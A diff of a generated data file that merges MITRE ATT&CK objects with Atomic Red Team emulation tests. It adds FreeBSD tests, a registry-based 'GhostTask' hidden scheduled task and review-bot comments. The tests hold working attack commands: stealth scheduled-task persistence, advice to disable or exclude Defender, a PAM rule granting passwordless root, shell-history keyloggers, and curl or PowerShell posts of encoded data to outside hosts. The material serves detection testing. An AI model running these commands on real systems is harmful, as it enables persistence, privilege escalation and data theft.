diff --git a/data_collector/generated_attck_data_v3.json b/data_collector/generated_attck_data_v3.json index 56ca488..c930d4c 100644 --- a/data_collector/generated_attck_data_v3.json +++ b/data_collector/generated_attck_data_v3.json @@ -1,5 +1,5 @@ { - "id": "bundle--381df177-dc72-494c-be4a-83027c2ca348", + "id": "bundle--feb75802-6feb-4205-87dd-3d739c429ed4", "type": "bundle", "spec_version": "2.0", "objects": [ @@ -71500,8 +71500,8 @@ "id": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6", "name": "Astaroth", "created": "2019-04-17T13:46:38.565Z", - "modified": "2023-03-21T21:20:23.717Z", - "x_mitre_version": "2.1", + "modified": "2023-11-06T20:12:28.502Z", + "x_mitre_version": "2.2", "type": "malware", "labels": [ "malware" @@ -71615,7 +71615,7 @@ "notes": "", "socks_support": false, "x_mitre_old_attack_id": "", - "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_domains": [ "enterprise-attack" 
@@ -87398,7 +87398,8 @@ "$xml = [System.IO.File]::ReadAllText(\"\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 07:45\n", "$xml = [System.IO.File]::ReadAllText(\"\\T1053.005\\src\\T1053_05_SCTASK_HIDDEN_ATTRIB.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", - "$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\n" + "$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\n", + "\"\\..\\ExternalPayloads\\PsExec.exe\" 
\\\\localhost -accepteula -s \"cmd.exe\"\n\"\\..\\ExternalPayloads\\GhostTask.exe\" \\\\localhost add lilghostie \"cmd.exe\" \"/c notepad.exe\" $env:USERDOMAIN + '\\' + $env:USERNAME logon\n" ], "commands": [], "queries": [], 
@@ -87624,6 +87625,55 @@ "command": "$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\n", "cleanup_command": "Unregister-ScheduledTask -TaskName \"AtomicTaskModifed\" -confirm:$false >$null 2>&1\n" } + }, + { + "name": "Scheduled Task (\"Ghost Task\") via Registry Key Manipulation", + "auto_generated_guid": "704333ca-cc12-4bcf-9916-101844881f54", + "description": "Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.\nThis requires a download of the GhostTask binary, which must be run as NT Authority\\SYSTEM. 
Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.\nFor further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "task_name": { + "description": "Name of the newly-added task", + "type": "string", + "default": "lilghostie" + }, + "task_command": { + "description": "Command you want the task to execute", + "type": "string", + "default": "notepad.exe" + }, + "target": { + "description": "System where the task should run", + "type": "string", + "default": "localhost" + }, + "user_name": { + "description": "Username to authenticate with, such as ATOMICDOMAIN\\AtomicAdmin", + "type": "string", + "default": "$env:USERDOMAIN + '\\' + $env:USERNAME" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec tool from Sysinternals must exist in the ExternalPayloads directory\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") { exit 0} else { exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" + }, + { + "description": "GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. 
This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"`\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\") { exit 0} else { exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} add #{task_name} \"cmd.exe\" \"/c #{task_command}\" #{user_name} logon\n", + "cleanup_command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} delete #{task_name} > nul" + } } ] } @@ -91170,8 +91220,8 @@ "auto_generated_guid": "0286eb44-e7ce-41a0-b109-3da516e05a5f", "description": "Encrypt data for exiltration\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "test_folder": { 
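Review bot: The `user_name` default `$env:USERDOMAIN + '\' + $env:USERNAME` in the GhostTask test is a PowerShell expression, but the executor is `command_prompt`, so cmd.exe hands GhostTask.exe that literal string rather than a DOMAIN\user value; either make the executor `powershell` or default to `%USERDOMAIN%\%USERNAME%`. The first executor line appears to start an interactive `cmd.exe` as SYSTEM through PsExec, and the GhostTask line that follows runs in the calling shell once that returns, so the SYSTEM requirement stated in the description is not obviously met by the command as written — worth verifying. The dependency text recommends `Add-MpPreference -ExclusionPath` for the ExternalPayloads directory, which outlives the test and is never reverted by `cleanup_command`, and `GhostTask.exe` is downloaded from a GitHub release with no hash check; at minimum the description should tell operators to run `Remove-MpPreference -ExclusionPath` afterwards and pin an expected SHA-256. Since this file is generated, the fix belongs in the upstream T1053.005 YAML.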
@@ -91195,7 +91245,7 @@ { "description": "gpg and zip are required to run the test.", "prereq_command": "if [ ! -x \"$(command -v gpg)\" ] || [ ! -x \"$(command -v zip)\" ]; then exit 1; fi;\n", - "get_prereq_command": "(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" + "get_prereq_command": "(which pkg && pkg install -y gnupg zip)||(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" } ], "executor": { @@ -98421,6 +98471,8 @@ "screencapture /tmp/T1113_desktop.png\n", "screencapture -x /tmp/T1113_desktop.png\n", "xwd -root -out /tmp/T1113_desktop.xwd\nxwud -in /tmp/T1113_desktop.xwd\n", + "xwd -root -out /tmp/T1113_desktop.xwd\nxwud -in /tmp/T1113_desktop.xwd\n", + "import -window root /tmp/T1113_desktop.png\n", "import -window root /tmp/T1113_desktop.png\n", "cmd /c start /b psr.exe /start /output c:\\temp\\T1113_desktop.zip /sc 1 /gui 0 /stopevent 12\nAdd-Type -MemberDefinition '[DllImport(\"user32.dll\")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;\n[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);\ncmd /c \"timeout 5 > NULL && psr.exe /stop\"\n", "Add-Type -AssemblyName System.Windows.Forms\n$screen = [Windows.Forms.SystemInformation]::VirtualScreen\n$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height\n$graphic = [Drawing.Graphics]::FromImage($bitmap)\n$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)\n$bitmap.Save(\"$env:TEMP\\T1113.png\")\n", 
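Review bot: The two new `command_list` entries are byte-identical to the `xwd` and `import` lines directly above them, so the aggregated list now carries duplicates; if the generator is meant to dedupe command strings it is not doing so here, and if not, anything keying on command text will double-count. The FreeBSD variants that produce them differ from the Linux tests only in their dependency commands, so deduplicating on the command string before emitting `command_list` would lose nothing. The same pattern recurs for `/tmp/T1222002 /tmp/ T1222002` later in this diff.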
@@ -98519,6 +98571,34 @@ "name": "bash" } }, + { + "name": "X Windows Capture (freebsd)", + "auto_generated_guid": "562f3bc2-74e8-46c5-95c7-0e01f9ccc65c", + "description": "Use xwd command to collect a full desktop screenshot and review file with xwud\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file path", + "type": "path", + "default": "/tmp/T1113_desktop.xwd" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Package with XWD and XWUD must exist on device\n", + "prereq_command": "if [ -x \"$(command -v xwd)\" ]; then exit 0; else exit 1; fi\nif [ -x \"$(command -v xwud)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "pkg install -y xwd xwud \n" + } + ], + "executor": { + "command": "xwd -root -out #{output_file}\nxwud -in #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, { "name": "Capture Linux Desktop using Import Tool", "auto_generated_guid": "9cd1cccb-91e4-4550-9139-e20a586fcea1", @@ -98546,6 +98626,33 @@ "name": "bash" } }, + { + "name": "Capture Linux Desktop using Import Tool (freebsd)", + "auto_generated_guid": "18397d87-38aa-4443-a098-8a48a8ca5d8d", + "description": "Use import command from ImageMagick to collect a full desktop screenshot\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file path", + "type": "path", + "default": "/tmp/T1113_desktop.png" + } + }, + "dependencies": [ + { + "description": "ImageMagick must be installed\n", + "prereq_command": "if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi\n", + "get_prereq_command": "pkg install -y ImageMagick7\n" + } + ], + "executor": { + "command": "import -window root #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, { "name": "Windows Screencapture", "auto_generated_guid": "3c898f62-626c-47d5-aad2-6de873d69153", 
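Review bot: The `prereq_command` of "X Windows Capture (freebsd)" exits 0 on the first `if` whenever `xwd` is present, so the `xwud` check on the second line is never evaluated and a host with only `xwd` passes the prerequisite; collapse it to `if [ -x "$(command -v xwd)" ] && [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi`. Both new tests declare `supported_platforms: ["linux"]` with "(freebsd)" only in the name; if the framework has no freebsd platform value that is understandable, but the description should then say the test is FreeBSD-only so it is not scheduled on Linux hosts where `pkg` does not exist.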
@@ -106407,6 +106514,7 @@ ], "command_list": [ "echo -n 111-11-1111 | base64\ncurl -XPOST MTExLTExLTExMTE=.redcanary.com\n", + "echo -n 111-11-1111 | b64encode -r -\ncurl -XPOST MTExLTExLTExMTE=.redcanary.com\n", "Path\\n----\\nC:\\Users\\victim = ([system.Text.Encoding]::UTF8.getBytes(\"Path\\n----\\nC:\\Users\\victim\"))\nabcdefghijklmnopqrstuvwxyz123456 = \"abcdefghijklmnopqrstuvwxyz123456\"\n$cyphertext = @();\nfor ($i = 0; $i -lt Path\\n----\\nC:\\Users\\victim.Count; $i++) {\n $cyphertext += Path\\n----\\nC:\\Users\\victim[$i] -bxor abcdefghijklmnopqrstuvwxyz123456[$i % abcdefghijklmnopqrstuvwxyz123456.Length];\n}\n$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)\n[System.Net.ServicePointManager]::Expect100Continue = $false\nInvoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive\n" ], "commands": [], @@ -106444,6 +106552,38 @@ "name": "sh" } }, + { + "name": "Base64 Encoded data (freebsd)", + "auto_generated_guid": "2d97c626-7652-449e-a986-b02d9051c298", + "description": "Utilizing a common technique for posting base64 encoded data.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "destination_url": { + "description": "Destination URL to post encoded data.", + "type": "url", + "default": "redcanary.com" + }, + "base64_data": { + "description": "Encoded data to post using fake Social Security number 111-11-1111.", + "type": "string", + "default": "MTExLTExLTExMTE=" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires curl\n", + "prereq_command": "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit 1; fi; \n", + "get_prereq_command": "pkg install -y curl\n" + } + ], + "executor": { + "command": "echo -n 111-11-1111 | b64encode -r -\ncurl -XPOST #{base64_data}.#{destination_url}\n", + "name": "sh" + } + }, { "name": "XOR Encoded data.", "auto_generated_guid": "c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08", 
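Review bot: The "Base64 Encoded data (freebsd)" executor runs `echo -n 111-11-1111 | b64encode -r -` but never uses its output; the POST goes to the hard-coded `#{base64_data}` default, so changing the plaintext does not change what is exfiltrated and the encode step is decorative. Either feed the encoded value into the request, e.g. `data=$(echo -n 111-11-1111 | b64encode -r -); curl -XPOST "${data}.#{destination_url}"`, or state in the description that the first line exists only to generate encoder telemetry. The Linux sibling above has the same shape, so if this is intentional a one-line note would save the next reader the same question.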
@@ -107043,6 +107183,7 @@ ], "command_list": [ "sudo sed -i \"1s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" /etc/pam.d/su-l\n", + "sudo sed -i \"\" \"8s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" /etc/pam.d/su\n", "sudo sed -i \"1s,^,auth sufficient /tmp/pam_evil.so\\n,g\" /etc/pam.d/su-l\n" ], "commands": [], @@ -107086,6 +107227,37 @@ "cleanup_command": "sudo sed -i \"\\,#{pam_rule},d\" #{path_to_pam_conf}\n" } }, + { + "name": "Malicious PAM rule (freebsd)", + "auto_generated_guid": "b17eacac-282d-4ca8-a240-46602cf863e3", + "description": "Inserts a rule into a PAM config and then tests it.\n\nUpon successful execution, this test will insert a rule that allows every user to su to root without a password.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_pam_conf": { + "description": "PAM config file to modify.", + "type": "string", + "default": "/etc/pam.d/su" + }, + "pam_rule": { + "description": "Rule to add to the PAM config.", + "type": "string", + "default": "auth sufficient pam_succeed_if.so uid >= 0" + }, + "index": { + "description": "Index where the rule is inserted.", + "type": "integer", + "default": 8 + } + }, + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i \"\" \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "cleanup_command": "sudo sed -i \"\" \"/#{pam_rule}/d\" #{path_to_pam_conf}\n" + } + }, { "name": "Malicious PAM module", "auto_generated_guid": "65208808-3125-4a2e-8389-a0a00e9ab326", 
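Review bot: The FreeBSD cleanup `sudo sed -i "" "/#{pam_rule}/d"` uses `/` as the delimiter, so any `pam_rule` containing a path (the Linux sibling's command_list shows `auth sufficient /tmp/pam_evil.so`) breaks the delete expression and leaves the passwordless-root rule in `/etc/pam.d/su`; keep the comma delimiter the Linux test uses, `sudo sed -i "" "\,#{pam_rule},d" #{path_to_pam_conf}`. The default rule references `pam_succeed_if.so`, which is a Linux-PAM module and does not appear to ship with FreeBSD's OpenPAM — verify on a FreeBSD host, otherwise `su` will fail to load the module rather than demonstrate the bypass. The `index` default of 8 also assumes a particular layout of `/etc/pam.d/su`; the description should say which line the rule is meant to precede so a reordered file does not silently insert it below the `auth` stack.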
@@ -108523,6 +108695,7 @@ "&\"\\T1056.001\\src\\Get-Keystrokes.ps1\" -LogPath $env:TEMP\\key.log\n", "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;\nif sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;\nsudo touch /tmp/password-auth.bk\nsudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so\nenable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so\nenable=* log_password\" >> /etc/pam.d/system-auth\n", "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "PS2=`logger -t \"$USER\" -f ~/.sh_history`\n$PS2\ntail /var/log/messages\n", "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", "cp -v /etc/pam.d/sshd /tmp/\necho \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\" >> /etc/pam.d/sshd\nsystemctl restart sshd\nsystemctl restart auditd\nssh ubuntu@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n", 
@@ -108609,6 +108782,28 @@ "cleanup_command": "unset PROMPT_COMMAND\n" } }, + { + "name": "Logging sh history to syslog/messages", + "auto_generated_guid": "b04284dc-3bd9-4840-8d21-61b8d31c99f2", + "description": "There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable and can be configured to write the latest \"bash history\" entries to the syslog.\n\nTo gain persistence the command could be added to the users .shrc or .profile \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires to be run in a bash shell and that logger and tee are installed.\n", + "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/sh\" ]; then echo -e \"\\n***** sh not running! *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v logger)\" ]; then echo -e \"\\n***** logger NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "PS2=`logger -t \"$USER\" -f ~/.sh_history`\n$PS2\ntail /var/log/messages\n", + "cleanup_command": "unset PS2\n" + } + }, { "name": "Bash session based keylogger", "auto_generated_guid": "7f85a946-a0ea-48aa-b6ac-8ff539278258", @@ -108620,7 +108815,7 @@ "dependencies": [ { "description": "This test requires to be run in a bash shell\n", - "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\n", + "prereq_command": "if [ \"$(echo $0)\" != \"bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\n", "get_prereq_command": "echo \"\"\n" } ], 
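Review bot: In "Logging sh history to syslog/messages" the backticks in `PS2=\`logger -t "$USER" -f ~/.sh_history\`` run `logger` once at assignment time and store its (empty) output in PS2, so the following `$PS2` line executes nothing and no per-command logging is set up; the test demonstrates a single upload of `~/.sh_history`, not the prompt-hook keylogger its description (which still talks about bash and PROMPT_COMMAND) claims. If the one-shot upload is the intent, rewrite the description to say so and drop the PS2 indirection; if a hook is the intent, sh has no PROMPT_COMMAND and PS2 is only expanded for continuation lines, so the technique needs restating. The prereq tests `$SHELL`, which is the login shell rather than the running one — the neighbouring hunk switches the bash test to `$0` for exactly that reason — and the dependency text still says "requires to be run in a bash shell".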
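Review bot: The new check `[ "$(echo $0)" != "bash" ]` rejects login shells, where `$0` is `-bash`, and any bash started by path, where it is `/bin/bash` or `/usr/local/bin/bash`, so the prerequisite fails in the common cases it is meant to accept. Testing the bash-specific variable is more robust: `if [ -z "$BASH_VERSION" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi`. If `$0` is kept, strip the directory and leading dash first, e.g. `case "${0#-}" in *bash) ;; *) exit 1;; esac`.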
@@ -108633,7 +108828,7 @@ } }, "executor": { - "name": "sh", + "name": "bash", "elevation_required": false, "command": "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> #{output_file}' DEBUG\necho \"Hello World!\"\ncat #{output_file}\n", "cleanup_command": "rm #{output_file}\n" @@ -109094,26 +109289,29 @@ "chown root /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", "chown -R root /tmp/AtomicRedTeam/atomics/T1222.002\n", "chattr -i /var/spool/cron/root\n", + "touch /tmp/T1222.002.txt\nchflags simmutable /tmp/T1222.002.txt\nchflags nosimmutable /tmp/T1222.002.txt\n", "/tmp/T1222002 /tmp/ T1222002\n", - "sudo /tmp/T1222002own /T1222.002/src/chown.c\n" + "/tmp/T1222002 /tmp/ T1222002\n", + "sudo /tmp/T1222002own /T1222.002/src/chown.c\n", + "/tmp/T1222002own /T1222.002/src/chown.c\n" ], "commands": [], "queries": [], "parsed_datasets": [ { "source": "atomics/T1222.002/T1222.002.yaml", - "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification", "content": { "attack_technique": "T1222.002", - "display_name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "display_name": "File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification", "atomic_tests": [ { "name": "chmod - Change file or folder mode (numeric mode)", "auto_generated_guid": "34ca1464-de9d-40c6-8c77-690adf36a135", "description": "Changes a file or folder's permissions using chmod and a specified numeric mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "numeric_mode": { 
@@ -109129,7 +109327,7 @@ }, "executor": { "command": "chmod #{numeric_mode} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109137,8 +109335,8 @@ "auto_generated_guid": "fc9d6695-d022-4a80-91b1-381f5c35aff3", "description": "Changes a file or folder's permissions using chmod and a specified symbolic mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "symbolic_mode": { @@ -109154,7 +109352,7 @@ }, "executor": { "command": "chmod #{symbolic_mode} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109162,8 +109360,8 @@ "auto_generated_guid": "ea79f937-4a4d-4348-ace6-9916aec453a4", "description": "Changes a file or folder's permissions recursively using chmod and a specified numeric mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "numeric_mode": { @@ -109179,7 +109377,7 @@ }, "executor": { "command": "chmod -R #{numeric_mode} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109187,8 +109385,8 @@ "auto_generated_guid": "0451125c-b5f6-488f-993b-5a32b09f7d8f", "description": "Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "symbolic_mode": { @@ -109272,8 +109470,8 @@ "auto_generated_guid": "967ba79d-f184-4e0e-8d09-6362b3162e99", "description": "Changes a file or folder's ownership only using chown.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "owner": { @@ -109289,7 +109487,7 @@ }, "executor": { "command": "chown #{owner} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { 
@@ -109337,6 +109535,25 @@ "name": "sh" } }, + { + "name": "chflags - Remove immutable file attribute", + "auto_generated_guid": "60eee3ea-2ebd-453b-a666-c52ce08d2709", + "description": "Remove's a file's `immutable` attribute using `chflags`.\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_modify": { + "description": "Path of the file", + "type": "path", + "default": "/tmp/T1222.002.txt" + } + }, + "executor": { + "command": "touch #{file_to_modify}\nchflags simmutable #{file_to_modify}\nchflags nosimmutable #{file_to_modify}\n", + "name": "sh" + } + }, { "name": "Chmod through c script", "auto_generated_guid": "973631cf-6680-4ffa-a053-045e1b6b67ab", @@ -109370,6 +109587,38 @@ "name": "sh" } }, + { + "name": "Chmod through c script (freebsd)", + "auto_generated_guid": "da40b5fe-3098-4b3b-a410-ff177e49ee2e", + "description": "chmods a file using a c script\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "source_file": { + "description": "Path of c source file", + "type": "path", + "default": "PathToAtomicsFolder/T1222.002/src/T1222.002.c" + }, + "compiled_file": { + "description": "Path of compiled file", + "type": "path", + "default": "/tmp/T1222002" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Compile the script from (#{source_file}). Destination is #{compiled_file}\n", + "prereq_command": "cc #{source_file} -o #{compiled_file}\n", + "get_prereq_command": "cc #{source_file} -o #{compiled_file}\n" + } + ], + "executor": { + "command": "#{compiled_file} /tmp/ T1222002\n", + "name": "sh" + } + }, { "name": "Chown through c script", "auto_generated_guid": "18592ba1-5f88-4e3c-abc8-ab1c6042e389", 
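Review bot: "chflags - Remove immutable file attribute" sets and clears `simmutable` (the system immutable flag, `schg`) but carries no `elevation_required: true`; on FreeBSD the system flags can only be set by root and, as far as I recall, clearing `schg` additionally requires `kern.securelevel` ≤ 0, so as a non-root test it fails at the first `chflags` and even as root it may fail to clear on a hardened host. If the intent is the user-level flag an adversary is most likely to strip, use `chflags uchg #{file_to_modify}` followed by `chflags nouchg #{file_to_modify}`, which needs only file ownership; otherwise add `elevation_required: true` and mention securelevel in the description. There is also no `cleanup_command` for `/tmp/T1222.002.txt`, and `Remove's` in the description should be `Removes`.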
@@ -109403,6 +109652,39 @@ "name": "sh", "elevation_required": true } + }, + { + "name": "Chown through c script (freebsd)", + "auto_generated_guid": "eb577a19-b730-4918-9b03-c5edcf51dc4e", + "description": "chowns a file to root using a c script\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "source_file": { + "description": "Path of c source file", + "type": "path", + "default": "PathToAtomicsFolder/T1222.002/src/chown.c" + }, + "compiled_file": { + "description": "Path of compiled file", + "type": "path", + "default": "/tmp/T1222002own" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Compile the script from (#{source_file}). Destination is #{compiled_file}\n", + "prereq_command": "cc #{source_file} -o #{compiled_file}\n", + "get_prereq_command": "cc #{source_file} -o #{compiled_file}\n" + } + ], + "executor": { + "command": "#{compiled_file} #{source_file}\n", + "name": "sh", + "elevation_required": true + } } ] } 
